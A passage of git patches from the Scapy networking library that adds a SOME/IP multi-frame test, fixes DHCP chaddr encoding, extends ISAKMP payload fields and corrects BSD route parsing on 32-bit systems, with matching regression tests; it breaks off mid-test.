f3e33283547..5508b3ec6ae 100644 --- a/test/contrib/automotive/someip.uts +++ b/test/contrib/automotive/someip.uts @@ -727,3 +727,43 @@ _opts_check(opts + opts[::-1]) p = SOMEIP(srv_id=1234, sub_id=4321, msg_type=0xff, retcode=0xff, offset=4294967040, data=[Raw(b"deadbeef")]) assert p.data[0].load == b"deadbeef" + += SOMEIP multiple frames in one TCP/UDP + +payload_3 = bytes.fromhex("deadbeef") +someip_3 = SOMEIP(srv_id=0xabcd, sub_id=0x8001, len=8 + len(payload_3)) +someip_3.payload = Raw(load=payload_3) + +payload_2 = bytes.fromhex("ff") +someip_23 = SOMEIP(srv_id=0x5678, sub_id=0x8002, len=8 + len(payload_2)) +someip_23.payload = Raw(load=payload_2 + bytes(someip_3)) + +payload_1 = bytes.fromhex("0000") +someip_123 = SOMEIP(srv_id=0x1234, sub_id=0x8001, len=8 + len(payload_1)) +someip_123.payload = Raw(load=payload_1 + bytes(someip_23)) + +eth_frame = ( + Ether(src="00:11:22:33:44:55", dst="AA:BB:CC:DD:EE:FF") + / IP(src="192.168.0.10", dst="192.168.0.20") + / UDP(sport=30501, dport=30491) + / someip_123 +) + +pkt = Ether(bytes(eth_frame)) + + +pkt.show() +layers = pkt.layers() +assert len(layers) == 6 +assert layers[-1] == SOMEIP +assert layers[-2] == SOMEIP +assert layers[-3] == SOMEIP + + +someip_123_x = pkt[SOMEIP] + +assert someip_123_x.data[0].load == payload_1 +someip_23_x = someip_123_x.payload +assert someip_23_x.data[0].load == payload_2 +someip_3_x = someip_23_x.payload +assert someip_3_x.data[0].load == payload_3 From 1dcad5dccab0ca63d11d403953f8f6f147a3c790 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Sun, 16 Feb 2025 13:35:53 +0100 Subject: [PATCH 1434/1632] DHCP: fix chaddr parsing (#4666) --- scapy/fields.py | 2 +- scapy/layers/dhcp.py | 9 +++++++++ test/scapy/layers/dhcp.uts | 10 +++++----- 3 files changed, 15 insertions(+), 6 deletions(-) diff --git a/scapy/fields.py b/scapy/fields.py index be0eba74537..958824cd0cb 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -806,7 +806,7 @@ def i2m(self, pkt, x): return b"\0\0\0\0\0\0" try: y = mac2str(x) - except (struct.error, OverflowError): + except (struct.error, OverflowError, ValueError): y = bytes_encode(x) return y diff --git a/scapy/layers/dhcp.py b/scapy/layers/dhcp.py index 031fe34decc..8b679bfbf36 100644 --- a/scapy/layers/dhcp.py +++ b/scapy/layers/dhcp.py @@ -34,6 +34,7 @@ FlagsField, IntField, IPField, + MACField, ShortField, StrEnumField, StrField, @@ -52,6 +53,7 @@ RandInt, RandNum, RandNumExpo, + VolatileValue, ) from scapy.arch import get_if_hwaddr @@ -63,7 +65,14 @@ class _BOOTP_chaddr(StrFixedLenField): + def i2m(self, pkt, x): + if isinstance(x, VolatileValue): + x = x._fix() + return MACField.i2m(self, pkt, x) + def i2repr(self, pkt, v): + if isinstance(v, VolatileValue): + return repr(v) if pkt.htype == 1: # Ethernet if v[6:] == b"\x00" * 10: # Default padding return "%s (+ 10 nul pad)" % str2mac(v[:6]) diff --git a/test/scapy/layers/dhcp.uts b/test/scapy/layers/dhcp.uts index 42758ed2314..fd953f551d5 100644 --- a/test/scapy/layers/dhcp.uts +++ b/test/scapy/layers/dhcp.uts @@ -35,20 +35,20 @@ assert udof.m2i("", unknown_value_pad) == [(254, b'\xff'*255), 'pad'] = DHCP - build s = raw(IP(src="127.0.0.1")/UDP()/BOOTP(chaddr="00:01:02:03:04:05")/DHCP(options=[("message-type","discover"),"end"])) -assert s == b'E\x00\x01\x10\x00\x01\x00\x00@\x11{\xda\x7f\x00\x00\x01\x7f\x00\x00\x01\x00C\x00D\x00\xfcf\xea\x01\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0000:01:02:03:04:0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00c\x82Sc5\x01\x01\xff' +assert s == b'E\x00\x01\x10\x00\x01\x00\x00@\x11{\xda\x7f\x00\x00\x01\x7f\x00\x00\x01\x00C\x00D\x00\xfc\x04}\x01\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x03\x04\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00c\x82Sc5\x01\x01\xff' s2 = raw(IP(src="127.0.0.1")/UDP()/BOOTP(chaddr="05:04:03:02:01:00")/DHCP(options=[("param_req_list",[12,57,45,254]),("requested_addr", "192.168.0.1"),"end"])) -assert s2 == b'E\x00\x01\x19\x00\x01\x00\x00@\x11{\xd1\x7f\x00\x00\x01\x7f\x00\x00\x01\x00C\x00D\x01\x058\xeb\x01\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0005:04:03:02:01:0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00c\x82Sc7\x04\x0c9-\xfe2\x04\xc0\xa8\x00\x01\xff' +assert s2 == b'E\x00\x01\x19\x00\x01\x00\x00@\x11{\xd1\x7f\x00\x00\x01\x7f\x00\x00\x01\x00C\x00D\x01\x05\xd5\x83\x01\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x04\x03\x02\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00c\x82Sc7\x04\x0c9-\xfe2\x04\xc0\xa8\x00\x01\xff' s3 = raw(IP(src="127.0.0.1")/UDP()/BOOTP(chaddr="05:04:03:02:01:00")/DHCP(options=[("time_zone",123),("uap-servers","www.example.com"),("netinfo-server-address","10.0.0.1"), ("ieee802-3-encapsulation", 2),("max_dgram_reass_size", 120), ("pxelinux_path_prefix","/some/path"), "end"])) -assert s3 == b'E\x00\x01=\x00\x01\x00\x00@\x11{\xad\x7f\x00\x00\x01\x7f\x00\x00\x01\x00C\x00D\x01)\x04i\x01\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0005:04:03:02:01:0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00c\x82Sc\x02\x04\x00\x00\x00{b\x0fwww.example.comp\x04\n\x00\x00\x01$\x01\x02\x16\x02\x00x\xd2\n/some/path\xff' +assert s3 == b'E\x00\x01=\x00\x01\x00\x00@\x11{\xad\x7f\x00\x00\x01\x7f\x00\x00\x01\x00C\x00D\x01)\xa1\x01\x01\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x04\x03\x02\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00c\x82Sc\x02\x04\x00\x00\x00{b\x0fwww.example.comp\x04\n\x00\x00\x01$\x01\x02\x16\x02\x00x\xd2\n/some/path\xff' s4 = raw(IP(src="127.0.0.1")/UDP()/BOOTP(chaddr="00:01:02:03:04:05")/DHCP(options=[("mud-url", "https://example.org"), ("captive-portal", "https://example.com"), ("ipv6-only-preferred", 0xffffffff), "end"])) -assert s4 == b"E\x00\x01=\x00\x01\x00\x00@\x11{\xad\x7f\x00\x00\x01\x7f\x00\x00\x01\x00C\x00D\x01)L\xd7\x01\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0000:01:02:03:04:0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00c\x82Sc\xa1\x13https://example.orgr\x13https://example.com\x6c\x04\xff\xff\xff\xff\xff" +assert s4 == b'E\x00\x01=\x00\x01\x00\x00@\x11{\xad\x7f\x00\x00\x01\x7f\x00\x00\x01\x00C\x00D\x01)\xeai\x01\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x03\x04\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00c\x82Sc\xa1\x13https://example.orgr\x13https://example.coml\x04\xff\xff\xff\xff\xff' s5 = raw(IP(src="127.0.0.1")/UDP()/BOOTP(chaddr="00:01:02:03:04:05")/DHCP(options=[("classless_static_routes", "192.168.123.4/32:10.0.0.1", "169.254.254.0/24:10.0.1.2"), ("rapid_commit", b""), ("forcerenew_nonce_capable", [1, "HMAC-MD5"]), "end"])) -assert s5 == b'E\x00\x01&\x00\x01\x00\x00@\x11{\xc4\x7f\x00\x00\x01\x7f\x00\x00\x01\x00C\x00D\x01\x12\xa7c\x01\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0000:01:02:03:04:0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00c\x82Scy\x11 \xc0\xa8{\x04\n\x00\x00\x01\x18\xa9\xfe\xfe\n\x00\x01\x02P\x00\x91\x02\x01\x01\xff' +assert s5 == b'E\x00\x01&\x00\x01\x00\x00@\x11{\xc4\x7f\x00\x00\x01\x7f\x00\x00\x01\x00C\x00D\x01\x12D\xf6\x01\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x03\x04\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00c\x82Scy\x11 \xc0\xa8{\x04\n\x00\x00\x01\x18\xa9\xfe\xfe\n\x00\x01\x02P\x00\x91\x02\x01\x01\xff' = DHCP - fuzz From ef6da4b39107484eaaf15483255f11a6a09cf31d Mon Sep 17 00:00:00 2001 From: David Maciejak Date: Sat, 22 Feb 2025 09:44:56 -0500 Subject: [PATCH 1435/1632] Add support for more ISAKMP payloads (#4600) * Add support for more ISAKMP payloads * Add deprecated to keep backward-compatibility * Add missing blank line to pass the health check --------- Co-authored-by: gpotter2 <10530980+gpotter2@users.noreply.github.com> --- scapy/layers/isakmp.py | 24 +++++++++++++++++++++++- 1 file changed, 23 insertions(+), 1 deletion(-) diff --git a/scapy/layers/isakmp.py b/scapy/layers/isakmp.py index 001728195d5..b909e66a2ce 100644 --- a/scapy/layers/isakmp.py +++ b/scapy/layers/isakmp.py @@ -409,10 +409,18 @@ class ISAKMP_payload_SA(ISAKMP_payload): class ISAKMP_payload_Nonce(ISAKMP_payload): name = "ISAKMP Nonce" + deprecated_fields = {"load": ("nonce", "2.6.2")} + fields_desc = ISAKMP_payload.fields_desc[:3] + [ + StrLenField("nonce", "", length_from=lambda x: x.length - 4) + ] class ISAKMP_payload_KE(ISAKMP_payload): name = "ISAKMP Key Exchange" + deprecated_fields = {"load": ("ke", "2.6.2")} + fields_desc = ISAKMP_payload.fields_desc[:3] + [ + StrLenField("ke", "", length_from=lambda x: x.length - 4) + ] class ISAKMP_payload_ID(ISAKMP_payload): @@ -439,6 +447,18 @@ class ISAKMP_payload_ID(ISAKMP_payload): class ISAKMP_payload_Hash(ISAKMP_payload): name = "ISAKMP Hash" + deprecated_fields = {"load": ("hash", "2.6.2")} + fields_desc = ISAKMP_payload.fields_desc[:3] + [ + StrLenField("hash", "", length_from=lambda x: x.length - 4) + ] + + +class ISAKMP_payload_SIG(ISAKMP_payload): + name = "ISAKMP Signature" + deprecated_fields = {"load": ("sig", "2.6.2")} + fields_desc = ISAKMP_payload.fields_desc[:3] + [ + StrLenField("sig", "", length_from=lambda x: x.length - 4) + ] NotifyMessageType = { @@ -471,6 +491,8 @@ class ISAKMP_payload_Hash(ISAKMP_payload): 27: "NOTIFY-SA-LIFETIME", 28: "CERTIFICATE-UNAVAILABLE", 29: "UNSUPPORTED-EXCHANGE-TYPE", + 30: "UNEQUAL-PAYLOAD-LENGTHS", + 16384: "CONNECTED", # RFC 3706 36136: "R-U-THERE", 36137: "R-U-THERE-ACK", @@ -520,7 +542,7 @@ class ISAKMP_payload_Delete(ISAKMP_payload): # bind_layers(_ISAKMP_class, ISAKMP_payload_CERT, next_payload=6) # bind_layers(_ISAKMP_class, ISAKMP_payload_CR, next_payload=7) bind_layers(_ISAKMP_class, ISAKMP_payload_Hash, next_payload=8) -# bind_layers(_ISAKMP_class, ISAKMP_payload_SIG, next_payload=9) +bind_layers(_ISAKMP_class, ISAKMP_payload_SIG, next_payload=9) bind_layers(_ISAKMP_class, ISAKMP_payload_Nonce, next_payload=10) bind_layers(_ISAKMP_class, ISAKMP_payload_Notify, next_payload=11) bind_layers(_ISAKMP_class, ISAKMP_payload_Delete, next_payload=12) From 53b9ccec8ee57d2aad3029183175c9a63e258e28 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Sat, 22 Feb 2025 18:59:38 +0100 Subject: [PATCH 1436/1632] Fix BSD loading on 32bits (#4669) --- scapy/arch/bpf/pfroute.py | 27 +++++++++++++++------ test/regression.uts | 51 ++++++++++++++++++++++++++++++++++++++- 2 files changed, 70 insertions(+), 8 deletions(-) diff --git a/scapy/arch/bpf/pfroute.py b/scapy/arch/bpf/pfroute.py index 20532c445b3..28eb59a5ba3 100644 --- a/scapy/arch/bpf/pfroute.py +++ b/scapy/arch/bpf/pfroute.py @@ -13,7 +13,14 @@ import socket import struct -from scapy.consts import BIG_ENDIAN, BSD, NETBSD, OPENBSD, DARWIN +from scapy.consts import ( + BIG_ENDIAN, + BSD, + DARWIN, + IS_64BITS, + NETBSD, + OPENBSD, +) from scapy.config import conf from scapy.error import log_runtime from scapy.packet import ( @@ -418,7 +425,7 @@ class SockAddrsField(FieldListField): holds_packets = 1 def __init__(self, name): - if DARWIN: + if not IS_64BITS or DARWIN: align = 4 else: align = 8 @@ -460,7 +467,8 @@ class if_data(Packet): 32 if BIG_ENDIAN else -32, _IFCAP, ), - StrFixedLenField("ifi_lastchange", 0, length=16), + StrFixedLenField("ifi_lastchange", 0, + length=16 if IS_64BITS else 8), ] def default_payload_class(self, payload: bytes) -> Type[Packet]: @@ -489,7 +497,8 @@ class if_data(Packet): Field("ifi_omcasts", 0, fmt="=Q"), Field("ifi_iqdrops", 0, fmt="=Q"), Field("ifi_noproto", 0, fmt="=Q"), - StrFixedLenField("ifi_lastchange", 0, length=16), + StrFixedLenField("ifi_lastchange", 0, + length=16 if IS_64BITS else 8), ] def default_payload_class(self, payload: bytes) -> Type[Packet]: @@ -563,7 +572,8 @@ class if_data(Packet): Field("ifi_noproto", 0, fmt="=Q"), Field("ifi_hwassist", 0, fmt="=Q"), Field("tt", 0, fmt="=Q"), - StrFixedLenField("tv", 0, length=16), + StrFixedLenField("tv", 0, + length=16 if IS_64BITS else 8), ] def default_payload_class(self, payload: bytes) -> Type[Packet]: @@ -752,13 +762,15 @@ class rt_metrics(Packet): Field("rmx_rtt", 0, fmt="=I"), Field("rmx_rttvar", 0, fmt="=I"), Field("rmx_pksent", 0, fmt="=I"), - StrFixedLenField("rmx_filler", b"", length=16), + StrFixedLenField("rmx_filler", 0, + length=16 if IS_64BITS else 8), ] def default_payload_class(self, payload: bytes) -> Type[Packet]: return conf.padding_layer else: + # FreeBSD class rt_metrics(Packet): fields_desc = [ @@ -774,7 +786,8 @@ class rt_metrics(Packet): Field("rmx_pksent", 0, fmt="=Q"), Field("rmx_weight", 0, fmt="=Q"), Field("rmx_nhidx", 0, fmt="=Q"), - StrFixedLenField("rmx_filler", b"", length=16), + StrFixedLenField("rmx_filler", 0, + length=16 if IS_64BITS else 8), ] def default_payload_class(self, payload: bytes) -> Type[Packet]: diff --git a/test/regression.uts b/test/regression.uts index bddaf06315d..4a959571b9a 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -2964,7 +2964,7 @@ def mock_inet_ntop(af, data): class BSDLoader: - def __init__(self, OPENBSD=False, FREEBSD=False, NETBSD=False, DARWIN=False, sysctldata=None, ifaces={}, AF_INET6=socket.AF_INET6): + def __init__(self, OPENBSD=False, FREEBSD=False, NETBSD=False, DARWIN=False, sysctldata=None, ifaces={}, AF_INET6=socket.AF_INET6, IS_64BITS=True): self.sysctldata = sysctldata self.ifaces = ifaces socket.AF_LINK = 18 @@ -2976,6 +2976,7 @@ class BSDLoader: # mock.patch('scapy.consts.FREEBSD', FREEBSD), mock.patch('scapy.consts.NETBSD', NETBSD), mock.patch('scapy.consts.DARWIN', DARWIN), + mock.patch('scapy.consts.IS_64BITS', IS_64BITS), ] def __enter__(self): # Apply patches that only occur when loading @@ -3029,6 +3030,26 @@ assert routes == [ (2887241727, 4294967295, '172.23.192.138', 'hvn0', '172.23.192.138', 1) ] += OpenBSD 7.6 GENERIC#531 i386 - read_routes() +~ mock_read_routes_bsd little_endian_only + +import zlib +_PFROUTE_DATA = zlib.decompress(bytes.fromhex('789c7bc2c0ca92c0c0c8c0c0c0c160cec2c0e0ccc10006fa760c28c08089012b60c52e0c07024c98fc35120f1871c92b083132b031b331a4a41a3088c632a47262316f8dc4ab1330be12434a4672414e6a62716a0a2e371c00fb919901ec4720e989c38f584103612520373d40e3d73330a0f8f10392bc8210338304d03939f90638cd43d68fee7e6f1ab8bf9e80fbff53c5fd8c60f7bb02630d9bfbb126b1062483f0bb9f111fff3f1050e67e109705ec7e47c606aceec70588713f304fa0f111691ce27e440a22358f5c80bb9f1912fe2ccc58ddbf1c4a478aec4a4716c791f5d1dd0ff726d87d4008749cd0e702ecea51e3835cff40d3138b0256ff781370377eff20ec23c67d94f8e700ba7f181cb0fa673a45fe79ff1f958f9ebec877ff281805a360148c8251300a46c128183a0000223e6527')) + +with BSDLoader(OPENBSD=True, sysctldata=_PFROUTE_DATA, AF_INET6=24, IS_64BITS=False) as pfroute: + routes = pfroute.read_routes() + +assert routes == [ + (0, 0, '172.24.224.1', 'de0', '172.24.234.200', 1), + (3758096384, 4026531840, '127.0.0.1', 'lo0', '127.0.0.1', 1), + (2130706432, 4278190080, '127.0.0.1', 'lo0', '127.0.0.1', 1), + (2130706433, 4294967295, '127.0.0.1', 'lo0', '127.0.0.1', 1), + (2887311360, 4294963200, '172.24.234.200', 'de0', '172.24.234.200', 1), + (2887311361, 4294967295, '0.0.0.0', 'de0', '172.24.234.200', 1), + (2887314120, 4294967295, '0.0.0.0', 'de0', '172.24.234.200', 1), + (2887315455, 4294967295, 